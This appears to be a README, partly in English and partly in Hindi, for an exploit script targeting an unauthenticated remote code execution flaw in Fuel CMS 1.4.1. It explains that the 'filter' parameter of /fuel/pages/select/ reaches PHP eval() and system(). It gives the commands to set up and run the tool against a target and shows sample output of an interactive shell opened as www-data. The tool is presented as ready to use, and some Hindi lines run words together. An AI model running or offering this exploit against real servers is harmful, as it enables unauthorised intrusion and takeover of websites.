
Unauthenticated RCE vulnerability in Fuel CMS 1.4.1.
Fuel CMS 1.4.1 में अप्रमाणित RCE भेद्यता।
/fuel/pages/select/एंडपॉइंट मेंfilterपैरामीटर PHP बैकएंड मेंeval()कॉल में बिना सैनिटाइज़ किए पास किया जाता है, जिससे एक क्राफ्टेड पेलोड के माध्यम से मनमाना कोड निष्पादन संभव होता है। ब्लाइंड इंजेक्शन के विपरीत, आउटपुट HTTP प्रतिक्रिया में सीधे परिलक्षित होता है, इसलिए किसी मध्यवर्ती फ़ाइल की आवश्यकता नहीं है।
filter पेलोड के साथ /fuel/pages/select/ पर एक GET अनुरोध भेजता है जो वांछित कमांड के साथ PHP के system() को कॉल करता है।python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
python3 exploit.py -t http://TARGET
उदाहरण:
$ python3 exploit.py -t http://10.10.10.10
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data
Shell> hostname
fuel-cms
Shell> exit